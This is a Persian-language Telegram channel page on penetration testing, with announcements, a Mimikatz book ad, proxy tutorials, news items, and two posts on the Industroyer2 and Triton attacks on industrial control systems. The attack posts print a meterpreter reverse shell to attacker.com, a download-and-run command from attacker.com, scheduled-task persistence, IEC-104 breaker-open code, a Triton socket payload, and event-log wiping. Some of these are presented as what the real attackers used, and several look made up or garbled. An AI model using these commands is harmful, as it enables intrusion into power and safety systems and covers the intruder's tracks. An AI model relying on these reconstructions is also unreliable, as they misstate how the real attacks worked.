Try Hack Box – Telegram
Try Hack Box
5.76K subscribers
680 photos
65 videos
123 files
689 links
1 Nov 2020
1399/08/11
Learn penetration testing & Red Team
https://youtube.com/@tryhackbox
Channels :
@TryHackBoxOfficial ( RoadMap )
@TryHackBoxStory ( Story Hacking )
Contact : @ThbxSupport
Download Telegram
در روزهای گذشته به دلیل شرایط ناشی از جنگ ما فعالیت خود را متوقف کردیم . اکنون با بهبود اوضاع فعالیت خود را از سر می‌گیریم و این بار با برنامه‌ها و رویکردهای تازه مصمم‌تر از همیشه برای دستیابی به اهداف‌مان گام برمی‌داریم.

ممنون از همراهی و شکیبایی شما
👍13🫡1
دیگر کانال ها و شبکه های اجتماعی ما را دنبال کنید :

💠 کانال های تلگرام ما

🔶️ آموزش تست نفوذ و Red Team :
🆔 @TryHackBox

🔶️ رودمپ های مختلف :
🆔 @TryHackBoxOfficial

🔶️ داستان های هک :
🆔 @TryHackBoxStory

🔶️ آموزش برنامه نویسی :
🆔 @TryCodeBox

🔶️ رادیو زیروپاد ( پادکست ها ) :
🆔 @RadioZeroPod


🔴 اینستاگرام :
🔗 http://www.instagram.com/TryHackBox

🔵 یوتیوب :
🔗 https://youtube.com/@tryhackbox
3
ما در مجموعه TryHackBox به دنبال مدرسین باانرژی و خلاق هستیم تا به تیم ما بپیوندند. اگر علاقه‌مند به تدریس و انتقال تجربه‌هاتون هستید، خوشحال می‌شیم رزومه‌تون رو برامون ارسال کنید یا با ما تماس بگیرید. 

ما منتظر دریافت رزومه‌های شما هستیم تا به تیم ما بپیوندید!

میتوانید رزومه خود را به ادرس های زیر ارسال کنید :
@ThbxSupport

Email : tryhackbox@gmail.com
3
#سوال
چگونه یک مهاجم می تواند از سرویس های آسیب پذیر برای دستیابی به دسترسی اولیه بهره برداری کند؟
تیرگان بر ایرانیان فرخنده باد.❤️

۱۰ تیر، روزی‌ست که در دل اساطیر ایران می‌درخشد؛
روزی که آرش کمانگیر، جان خویش را در تیر نهاد تا مرز ایران‌زمین را از فراز دماوند تا دوردست‌ها برساند.
تیرگان در تقویم ایران باستان، جشن آب، باران، تیر و پاکی‌ست. در این روز، ایرانیان به یاد آرش، برای باران دعا می‌کردند، در کوزه‌ها آب می‌ریختند، و با پاشیدن آب، دل‌ها را تازه می‌کردند.
جالب‌تر اینکه ابوریحان بیرونی این روز را «بزرگداشت نویسندگان» نیز دانسته؛ روزی برای پاسداشت اندیشه و واژه.
برخی روایت‌ها، تیرگان را در ۱۳ تیر دانسته‌اند، اما آن‌چه پابرجاست، خود یاد آرش و شکوه فرهنگ ایرانی‌ست

جشن تیرگان(جشن آب پاشان)
📖جشن تیرگان در تیر روز از تیرماه برابر با ۱۳ تیر در گاهشمار زرتشتی و ۱۰ تیر در گاهشمار جلالی برگزار می‌شود.
این جشن در گرامیداشت تیشتر(ستاره ی باران آور در فرهنگ ایرانی)است.
در روزشمارها تیرگان روز کمان‌ کشیدن آرش کمانگیر و پرتاب تیر از فراز البرز است.
همچنین جشن تیرگان به گفته ابوریحان بیرونی در آثارالباقیه، روز بزرگداشت جایگاه نویسندگان در ایران باستان بوده است.


@TryHackBox
12
📚 کتابچه "Mimikatz: تسلط عملی بر تکنیک‌های پیشرفته حملات Active Directory" از مقدماتی تا پیشرفته.

اگر در حوزه امنیت سایبری و تست نفوذ Active Directory فعالیت میکنید، این کتابچه ضروریترین منبعی است که میتوانید داشته باشید!

منبعی کامل برای تیم‌های قرمز (Red Team)، شامل دستورات عملی، اسکریپت‌های آماده، و تکنیک‌های evasion است که مستقیماً در تست‌های نفوذ استفاده میشوند.


همین حالا این کتاب تخصصی را به زبان فارسی بخوانید.
🔥 تخفیف به مناسبت جشن تیرگان
💰 قیمت اصلی: ۲۵۰,۰۰۰ تومان 
💥 با ۴۰٪ تخفیف: فقط ۱۵۰,۰۰۰ تومان 
⚠️ مهلت تخفیف: تا آخر شب .


📌 جهت خرید و کسب اطلاعات بیشتر، به ایدی زیر پیام دهید:
@THBxSupport
6
🚨 نفوذ هکرها به تاسیسات آب آمریکا با رمز عبور پیش‌فرض "1111"

هفته گذشته، یک گروه هکری توانست فقط با استفاده از رمز عبور ساده و پیش‌فرض 1111 کنترل بخشی از سیستم مدیریت تاسیسات آب‌رسانی در یکی از ایالت‌های آمریکا را به‌دست بگیرد
این سیستم‌ها معمولاً برای کنترل فشار آب، ترکیب مواد شیمیایی تصفیه و سطح مخازن استفاده می‌شوند. هک شدن چنین سیستمی می‌تواند امنیت عمومی را به خطر بیندازد و بله، هنوز هم در سال 2025 چنین رمزهایی کار می‌کنند!

⚠️ وقتی یک سیستم حیاتی مثل آب‌رسانی یا برق، فقط با یک رمز ساده قابل هک باشد، نتایجش می‌تواند فاجعه‌بار باشد به عنوان مثال

- آلودگی عمدی آب آشامیدنی
- قطع گسترده برق یا اختلال در خدمات شهری
 ـ ارسال هشدارهای جعلی یا ایجاد وحشت عمومی
 ـ  حمله باج‌افزاری به بیمارستان، بانک یا اداره‌های دولتی
 - نفوذ به زنجیره تأمین کالاها و گسترش بدافزارها

پیشنهاد میشه اگر شما هم از مودم، دوربین، دستگاه هوشمند یا حتی گوشی استفاده می‌کنید، موارد زیر را جدی بگیرید

     - هیچ‌وقت از رمز پیش‌فرض استفاده نکنید (مثل 1234 یا admin)
     - دستگاه‌های هوشمند را بدون رمز یا با پورت باز به اینترنت وصل نکنید
     - رمزها را هر چند وقت یک‌بار تغییر دهید
     - از احراز هویت دومرحله‌ای استفاده کنید، مخصوصاً در ایمیل، واتساپ و شبکه‌های اجتماعی

🟠 سخن نهایی
امنیت فقط مخصوص هکرها یا دولت‌ها نیست و همه ما در زنجیره امنیت نقش داریم.

📚 منبع اصلی خبر
https://thehackernews.com/2025/07/manufacturing-security-why-default.html

✍️نویسنده
@TryHackBox| The Chaos

#CyberSecurity #SCADA #ICS #Hacking #news #CriticalInfrastructure #IOTSecurity #IndustrialSecurity #CyberAttack #2025Security
🏆95👍2
🔖 بازگشت سایه‌ی استاکس‌نت – قسمت اول
حمله واقعی به زیرساخت برق اوکراین با Industroyer2

💠 حمله پیشرفته‌ای از نوع ICS Targeted Malware توسط گروه APT روسی (Sandworm) تو سال ۲۰۲۲، گروه هکری وابسته به اطلاعات نظامی روسیه (GRU) با نام Sandworm حمله‌ای بزرگ و واقعی به زیرساخت برق اوکراین انجام داد. این حمله نسخه‌ای ارتقایافته از بدافزار معروف استاکس‌نت بود که بهش لقب دادن:

Industroyer2


این حمله به‌قصد خاموشی گسترده و بی‌ثباتی در مناطق حساس در اوکراین طراحی شده بود، دقیقاً همزمان با حمله‌ی نظامی روسیه.
حالا تو این دو قسمت، این حمله رو در ۵ فاز عملیاتی بررسی می‌کنیم.

📌 فاز اول: شناسایی و جمع‌آوری اطلاعات از شبکه برق (ICS Recon)
هکرها قبل از حمله، با استفاده از ابزارها و تکنیک‌های OSINT و دسترسی اولیه به شبکه، ساختار سیستم برق و نوع تجهیزات ICS رو شناسایی کردن.

🛠 ابزارهای مورد استفاده:
< — Shodan — >
پیدا کردن PLCها و HMIهای متصل به اینترنت

< — Wireshark — >
برای بررسی پروتکل‌های صنعتی مثل IEC-104، Modbus, DNP3

< — Nmap — >
با اسکریپت‌های مخصوص ICS

< — FOCA — >
برای جمع‌آوری متادیتای فایل‌های منتشرشده توسط شرکت برق

< — Active Directory Enum — >
برای کشف سیستم‌های مهندسی در شبکه داخلی

اسکن نمونه با Nmap:
nmap -sS -p 2404 --noscript=modbus-discover 10.10.0.0/16 


استخراج اطلاعات PLC از ترافیک IEC-104 با Wireshark:

iec104.asdu.typeid == 45 || iec104.asdu.typeid == 46


📌 فاز دوم: ورود به شبکه و اجرای اولیه بدافزار
گزارش CERT-UA نشون می‌ده که Sandworm از حساب RDP یکی از مهندسین شبکه وارد سیستم شده و از طریق یک فایل آلوده بدافزار رو مستقر کرده.

🔶 روش‌های ورود
سرقت رمز عبور از طریق فیشینگ یا Keylogger
استفاده از RDP Credentialهای لو رفته
اجرای فایل EXE مخرب با دسترسی SYSTEM

نمونه بدافزار ساخته‌شده با msfvenom:
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=attacker.com LPORT=443 -f exe > industroyer2.exe

ایجاد Persistence:
schtasks /create /tn "SCADA Sync" /tr "C:\ProgramData\industroyer2.exe" /sc onlogon /ru SYSTEM 



📌 فاز سوم: ارتباط مستقیم با PLC و تخریب زیرساخت
بدافزار Industroyer2 به‌صورت مستقیم به PLCهای شبکه برق وصل می‌شه و با استفاده از پروتکل IEC-104 دستور باز یا بسته‌کردن بریکرها (Breaker) رو صادر می‌کنه.

🔶 ساختار عملکرد بدافزار:
- اتصال TCP به پورت 2404 (IEC-104)
- ارسال دستور Single Command برای باز کردن بریکر
- ارسال دستور Double Command برای شبیه‌سازی فرمان مهندسی قانونی

نمونه کد Python برای باز کردن Breaker:
from iec104 import IEC104Client client = IEC104Client("10.0.0.12", 2404) client.connect() 
Cause = Spontaneous client.send_command(asdu_type=45, ioa=101, value=0) # breaker open client.disconnect()


فایل کانفیگ شبکه در بدافزار:

{ "targets": [ {"ip": "10.0.0.12", "type": "siemens", "breaker_id": 101}, {"ip": "10.0.0.15", "type": "schneider", "breaker_id": 110} ], "payload_type": "iec104", "command": "breaker_open" }


📌 فاز چهارم: پاکسازی ردپا و لاگ‌ها
بعد از اجرا، بدافزار تلاش می‌کنه ردپاهای خودش رو پاک کنه

دستورات استفاده‌شده:
wevtutil cl System wevtutil cl Application Remove-Item -Path "$env:APPDATA\Microsoft\Windows\Recent\*" -Force 



📌 فاز پنجم: شناسایی حمله و مقابله توسط CERT-UA
مرکز پاسخ اضطراری اوکراین تونست حمله رو در لحظه آخر شناسایی کنه.
تحلیل نمونه Industroyer2 نشون داد که فقط روی سیستم‌های خاص با تجهیزات SCADA فعال می‌شه.
با بررسی لاگ‌های شبکه و دسترسی مشکوک از RDP کشف و فایل EXE با نام جعلی update_driver.exe روی سیستم مهندسین دیده شد.

🔶 روش‌های دفاعی پیشنهادی
- استفاده از ابزارهای تخصصی ICS مانند Nozomi و Dragos
- ایزوله‌کردن کامل سیستم‌های SCADA و PLC از شبکه IT
- بررسی ترافیک پورت 2404 با Suricata/Zeek برای دستورات مشکوک
- تحلیل Signatureهای پروتکل IEC-104

📌 این حمله ادامه‌ی استاکس‌نت بود؛ با دقت بیشتر، طراحی خاص برای اوکراین و قابلیت اجرای فرمان مستقیم روی شبکه برق. این حمله نشون داد که تو دنیای جنگ‌های مدرن، کلید برق یه کشور می‌تونه با یه packet خاموش بشه.

✍️نویسنده
@TryHackBox| Condor

#ICS #SCADA #CyberWarfare #APT #Industroyer #InfoSec
👍85
🚀 آموزش Proxies (پارت 0)

📌 پروکسی‌ها در واقع واسطه‌هایی هستند که بین کلاینت‌ها و سرورها قرار می‌گیرند و به عنوان یک سرور پروکسی عمل می‌کنند. باهم درباره‌ی سرورهای پروکسی صحبت می‌کنیم که چگونه درخواست‌های HTTP را بین طرفین (کلاینت و سرور) به جلو و عقب منتقل می‌کنند.

🔍 مباحثی که در سری پست ها به آن‌ها پرداخته می‌شود:
نحوه قرارگیری پروکسی‌ها در مقابل دروازه‌ها و استقرار آن‌ها در HTTP
راه‌هایی که پروکسی‌ها می‌توانند مفید باشند و به ما کمک کنند
نحوه استقرار پروکسی‌ها در شبکه‌های واقعی و هدایت ترافیک به سرورهای پروکسی
روش پیکربندی مرورگر برای استفاده از پروکسی
تفاوت درخواست‌های پروکسی با درخواست‌های مستقیم به سرور و تأثیر پروکسی‌ها بر رفتار مرورگرها
چگونگی ردیابی مسیر درخواست‌ها با استفاده از هدرهای Via و متد TRACE
کنترل دسترسی مبتنی بر پروکسی در HTTP
تعامل پروکسی‌ها با سرورها و کلاینت‌هایی که نسخه‌ها و ویژگی‌های متفاوتی از HTTP را پشتیبانی می‌کنند

✍️نویسنده
@TryHackBox| The Chaos

#HTTP #Proxy #CyberSecurity
👍112
📌 پروکسی‌ها در واقع واسطه‌هایی هستند که بین کلاینت‌ها و سرورها قرار می‌گیرند و مانند یک نماینده عمل می‌کنند.

🌍 مثال روزمره:
فرض کنید می‌خواهید نامه‌ای به یک شرکت بفرستید، اما به جای ارسال مستقیم، آن را به دفتر پستی می‌سپارید. دفتر پستی نامه را دریافت می‌کند، آدرس را بررسی می‌کند، سپس آن را به مقصد نهایی می‌رساند. حتی ممکن است قبل از ارسال، محتوای نامه را بررسی کند یا آن را در یک پاکت جدید بگذارد.

🔹 پروکسی هم دقیقاً همین‌طور کار می‌کند!

وقتی شما به اینترنت متصل می‌شوید، درخواست‌های شما ابتدا به پروکسی می‌رود.

پروکسی می‌تواند درخواست را تغییر دهد، فیلتر کند یا کش کند و سپس به سرور اصلی ارسال کند.

پاسخ سرور هم ابتدا به پروکسی برمی‌گردد و بعد به شما می‌رسد.

💡 پروکسی مثل همان دفتر پستی است: واسطه‌ای که ارتباط شما با دنیای اینترنت را مدیریت می‌کند!

🔍 واسطه‌های وب (Web Intermediaries) چیستند؟

تصور کنید می‌خواهید با یک فروشگاه آنلاین ارتباط برقرار کنید:

📱 بدون پروکسی (ارتباط مستقیم):
شما (کلاینت) ← مستقیماً به فروشگاه (سرور)

🖥 با پروکسی (ارتباط با واسطه):
شما ← پروکسی ← فروشگاه

به زبان ساده:
پروکسی مثل یک رابط هوشمند عمل می‌کند که:

     - درخواست‌های شما را دریافت می‌کند

     - به جای شما با سرور اصلی ارتباط برقرار می‌کند

     - پاسخ را از سرور گرفته

     - و در نهایت آن را به شما تحویل می‌دهد

💡 مثل یک مترجم یا نماینده: دقیقاً همانطور که در مذاکرات بین‌المللی از مترجم استفاده می‌شود، پروکسی هم بین شما و سرورهای اینترنتی واسطه می‌شود تا ارتباط به بهترین شکل ممکن برقرار شود.

🌐 نحوه عملکرد:

     - بدون پروکسی، کلاینت‌ها مستقیماً با سرورهای HTTP ارتباط برقرار می‌کنند

     - با وجود پروکسی، کلاینت با سرور پروکسی صحبت می‌کند

     - پروکسی به نمایندگی از کلاینت با سرور اصلی ارتباط برقرار می‌نماید

     - کلاینت تراکنش را کامل انجام می‌دهد، اما از خدمات ارزشمند پروکسی بهره می‌برد

🔄 ویژگی‌های کلیدی:

     - هم به عنوان سرور وب (برای کلاینت)

     - هم به عنوان کلاینت وب (برای سرور اصلی) عمل می‌کند

     - درخواست‌های HTTP را به سرورهای مناسب ارسال می‌کند

     - اتصالات و درخواست‌ها را مدیریت می‌نماید

     - پاسخ‌ها را دقیقاً مانند یک وب سرور بازمی‌گرداند

⚙️ مهم‌ترین وظایف:

     - ارسال درخواست‌های HTTP به سرورها

     - دریافت و پردازش پاسخ‌ها

     - رعایت دقیق پروتکل‌های HTTP

     - مدیریت صحیح تراکنش‌ها بین کلاینت و سرور

✍️نویسنده
@TryHackBox| The Chaos

#HTTP #Proxy #CyberSecurity
🔥6
Forwarded from Try Hack Box
WEB APPLICATION PENTESTING CHECKLIST tryhackbox .pdf
1.1 MB
🔥 نمونه‌ای از چک‌لیست برای یک buughunter و pentester با 500 مورد تست، بر اساس OWASP.

#bugbounty
@TryHackBox
🔥15
💢 مهندسی اجتماعی در رد تیمینگ

در حوزه‌ی امنیت سایبری، عنصر انسانی اغلب ضعیف‌ترین قسمت است. مهندسی اجتماعی از این ضعف بهره‌برداری می‌کند و با فریب افراد، آن‌ها را وادار به فاش کردن اطلاعات محرمانه یا انجام اقداماتی می‌کند که امنیت را به خطر می‌اندازد. برای اعضای رد تیم ، تسلط بر فنون مهندسی اجتماعی بسیار مهم است تا بتوانند حملاتی واقعی را شبیه‌سازی کرده و مقاومت سازمان در برابر این تهدیدات را ارزیابی کنند. به زودی به جزئیات مهندسی اجتماعی، روش‌ها، ابزارها، فنون و تأثیر عمیقی که می‌تواند بر امنیت سازمانی بگذارد می‌پردازیم.

به زودی ....
#مهندسی_اجتماعی
@TryHackBox
👍11
Try Hack Box
🔖 بازگشت سایه‌ی استاکس‌نت – قسمت اول حمله واقعی به زیرساخت برق اوکراین با Industroyer2 💠 حمله پیشرفته‌ای از نوع ICS Targeted Malware توسط گروه APT روسی (Sandworm) تو سال ۲۰۲۲، گروه هکری وابسته به اطلاعات نظامی روسیه (GRU) با نام Sandworm حمله‌ای بزرگ و واقعی…
🔖بازگشت سایه‌ی استاکس‌نت – قسمت دوم
بدافزاری که سیستم‌های ایمنی صنعتی (SIS) رو هدف گرفت

💠 حمله واقعی به تأسیسات پتروشیمی و نیروگاه‌ها با هدف ایجاد فاجعه انسانی


📌 فاز اول: شناخت سیستم‌های SIS و آسیب‌پذیری‌ها

سیستم‌های SIS (Safety Instrumented Systems) وظیفه قطع خودکار و فوری عملیات خطرناک در کارخانه‌ها و نیروگاه‌ها رو دارند تا از وقوع انفجار یا نشت مواد سمی جلوگیری کنند. Triton طوری طراحی شده که این سیستم‌ها رو خاموش کنه یا کنترل‌شون رو بدست بگیره.

💻 سیستم‌های هدف:
Triconex SIS ساخت Schneider Electric
PLCهای خاص با دسترسی شبکه به پورت 18245


📌 فاز دوم: نفوذ به شبکه ICS و نصب بدافزار

گزارش FireEye نشون داده که مهاجم‌ها ابتدا به شبکه IT نفوذ کردند و از اونجا به شبکه کنترل صنعتی نفوذ کردند. بعد با استفاده از دسترسی‌های RDP یا VPN غیرمجاز، بدافزار Triton رو روی سرور مهندسی نصب کردند.

نمونه دستورات نصب بدافزار:
Invoke-WebRequest -Uri http://attacker.com/triton.exe -OutFile C:\Windows\Temp\triton.exe Start-Process -FilePath C:\Windows\Temp\triton.exe 



📌 فاز سوم: ارتباط مستقیم با PLCهای Triconex و تغییر عملکرد

بدافزار با استفاده از پروتکل اختصاصی Triconex، با PLCهای SIS ارتباط برقرار می‌کنه و کدهای امنیتی رو تغییر می‌ده یا کاملاً سیستم رو از کار می‌اندازه.

نمونه کد بازسازی‌شده (Pseudo Python):
import socket def send_triton_cmd(ip, port, payload): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, port)) s.send(payload) response = s.recv(1024) s.close() return response
payload = b'\x01\x03\x00\x00\x00\x06\xC5\xCD'
response = send_triton_cmd("10.10.10.5", 18245, payload) print("Response:", response)



📌فاز چهارم: ایجاد خاموشی و نابودی عملکرد ایمنی

با اجرای فرمان‌های بدافزار، سیستم‌های ایمنی به حالت Fail-safe نمی‌رن بلکه خاموش می‌شن، این یعنی حتی اگر خطری وجود داشته باشه، سیستم به وظیفه‌اش عمل نمی‌کنه و باعث حادثه بزرگ می‌شه.
فاز پنجم: پاک‌سازی ردپا و استتار
توطئه‌گران ردپای خود را با حذف لاگ‌ها و بازنویسی تاریخچه فرمان‌ها پاک کردند.

دستورات پاک‌سازی:
wevtutil cl Security wevtutil cl System Clear-EventLog -LogName "Application"


🔶 روش‌های مقابله و پیشگیری
- پیاده‌سازی فیلترهای دقیق در فایروال‌های صنعتی
- نظارت بر ترافیک پورت 18245 و تشخیص رفتارهای غیرمعمول
- آموزش کارکنان به ویژه مهندسین شبکه برای جلوگیری از فیشینگ
- استفاده از سیستم‌های IDS/IPS تخصصی برای ICS
- ایزوله‌سازی شبکه کنترل صنعتی از شبکه عمومی و اینترنت


📌 بدافزار Triton یک هشدار جدی به صنایع حساس و زیرساخت‌های حیاتی جهان است که حمله‌های سایبری می‌توانند به قیمت جان انسان‌ها تمام شوند. کنترل سیستم‌های ایمنی صنعتی دیگر یک گزینه نیست، یک ضرورت حیاتی است.

✍️نویسنده
@TryHackBox| Condor

#ICS #SCADA #CyberWarfare #APT #Triton #InfoSec
👍52
🚨 ۹۵٪ از شرکت‌های آمریکایی از هوش مصنوعی مولد (Generative AI) استفاده می‌کنند — اغلب بدون اطلاع تیم IT!

🧠 ابزارهای هوش مصنوعی مثل ChatGPT، Gemini، Copilot و Claude در حال حاضر در اکثر شرکت‌ها مورد استفاده قرار می‌گیرند. اما مشکل کجاست؟

📤 داده‌های حساس شامل اطلاعات مشتری، کد منبع، قراردادها و حتی اطلاعات مالی بدون هیچ نظارت یا محدودیتی وارد این ابزارها می‌شوند.

⚠️ این پدیده جدید به نام "Shadow AI" شناخته می‌شود:
استفاده پنهانی از هوش مصنوعی توسط کارمندان، بدون هماهنگی با واحد IT یا امنیت.

📚 منبع اصلی خبر:
The Hacker News – Shadow AI in 2025

✍️نویسنده
@TryHackBox | TheChaos

#ShadowAI #AIsecurity #DataPrivacy #GenerativeAI #CyberSecurity #AIThreats #GPT #InfoSec #News
8
مهندسی اجتماعی در تیم قرمز.pdf
1.1 MB
💢 مهندسی اجتماعی در رد تیمینگ

در حوزه‌ی امنیت سایبری، عنصر انسانی اغلب ضعیف‌ترین قسمت است. مهندسی اجتماعی از این ضعف بهره‌برداری می‌کند و با فریب افراد، آن‌ها را وادار به فاش کردن اطلاعات محرمانه یا انجام اقداماتی می‌کند که امنیت را به خطر می‌اندازد. برای اعضای رد تیم ، تسلط بر فنون مهندسی اجتماعی بسیار مهم است تا بتوانند حملاتی واقعی را شبیه‌سازی کرده و مقاومت سازمان در برابر این تهدیدات را ارزیابی کنند. به زودی به جزئیات مهندسی اجتماعی، روش‌ها، ابزارها، فنون و تأثیر عمیقی که می‌تواند بر امنیت سازمانی بگذارد می‌پردازیم.


#مهندسی_اجتماعی
@TryHackBox
8
Try Hack Box
مهندسی اجتماعی در تیم قرمز.pdf
دوستان سر فرصت بحث مهندسی اجتماعی بازترش میکنیم الان درگیر اماده کردن کتاب جدید هستم .
8